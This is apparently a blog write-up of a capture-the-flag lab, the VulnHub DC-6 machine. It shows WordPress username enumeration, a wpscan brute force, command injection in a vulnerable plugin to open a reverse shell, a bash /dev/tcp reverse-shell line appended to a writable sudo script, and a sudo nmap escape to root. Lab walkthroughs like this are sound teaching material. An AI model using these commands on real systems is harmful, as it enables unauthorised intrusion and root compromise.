VulnHub: DC-6 Writeup

DC-6 starts off by enumerating usernames from a WordPress website. I’m able to gain a set of credentials to log into the admin panel with a brute-force attack. There is a WP Plugin which can be leveraged to gain a foothold on the system. A to-do note containing the user’s credentials is discovered while enumerating the home directory. For the root part, there is a sudo privileges on a writable backup script and nmap which allows me to escalate to other users then straight to root.


Because and are virtual gateway addresses, the target machine’s IP address is most likely

arp-scan --interface eth0 '' | tee scans/00-arp-scan-dc6

With initial scan, nmap shows two ports open: SSH on port 22 and Apache Web Server on port 80.

nmap -n -sC -sV -oA scans/10-initial-dc6 '' -v
Nmap scan

From the results above, there’s a redirection to http://wordy/ on port 80. To properly resolve the web, I’ll add wordy to my /etc/hosts file.

echo '   wordy' >> /etc/hosts

This page clearly states that it’s a WordPress site.

Wordy homepage

Nothing interesting to explore here, but the text secure plugins seems to be a hint from the machine’s author.

Runningnmap script against this website finds several usernames.

nmap -p 80 --script "http-wordpress*" wordy
Nmap WordPress script

I’ll save those usernames into a file called users.

wpscan identifies two vulnerable WP plugins: an RCE and a user role privilege escalation.

wpscan --url http://wordy/ --enumerate vp --plugins-detection aggressive --api-token your_token123

I’m interested with the RCE one, but before that I’ll have to find creds.

At that time, I was stuck for a couple of hours. Asking for a nudge and the answer was to brute force, I didn’t know that the box’s author actually gave us a hint to create a custom wordlist from rokyou.txt.


I’ll create new wordlist from rockyou.txt and then use it to perform a brute force attack using wpscan.

wpscan --url http://wordy/ --usernames users --passwords passwords.txt

It returns one valid credentials: mark:helpdesk10.

Valid login


With the credentials I obtained, I can login into WP Dashboard.

WP Dashboard

From the previous wpscan, I searched the exploit PoC for Plainview Activity Monitor RCE and found this from exploit-db.

The exploit PoC exploits a vulnerability that comes from this IP tools feature.

IP Lookup

I’ll hit the lookup button and intercept the request on Burp.

RCE can be achieved by adding a set of malicious OS commands after the command pipe |, semi colon ; (stacked command), or logical OR || at the ip section. In this case, I send a reverse shell.

Reverse shell

Privilege Escalation

The home directory is readable by www-data and there are two interesting files: and things-to-do.txt.

Interesting files

I immediately checked the contents of and things-to-do.txt.

The script is writable by group devs, and I’ll note that.

Contents of

And this things-to-do.txt contains graham’s credentials.

Contents of things-do-do.txt

I tried the graham’s creds, graham:GSo7isUM1D4, on SSH, and it worked.

SSH graham

User graham has sudo privileges on the script, and this allows me to run the script as user jens.

Sudo privileges on

Because the script is also writable by graham (devs group), I can exploit this to escalate myself to jens by adding a reverse shell line to the script and then run it with sudo.

graham@dc-6:~$ echo 'bash -i >& /dev/tcp/ 0>&1' >> /home/jens/
Escalate to jens

I found out that user jens is allowed to execute nmap as root user.

Sudo privileges on nmap

I can also exploit this using reference from GTFObins.

jens@dc-6:/home/graham$ TF=$(mktemp)
jens@dc-6:/home/graham$ echo 'os.execute("/bin/sh")' > $TF
jens@dc-6:/home/graham$ sudo nmap --script=$TF
Escalate to root

And here is the flag:

Root flag of DC-6

Originally published at:

I mostly write about CTF solutions and other IT related stuff that others might find useful | Partially moving to:

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store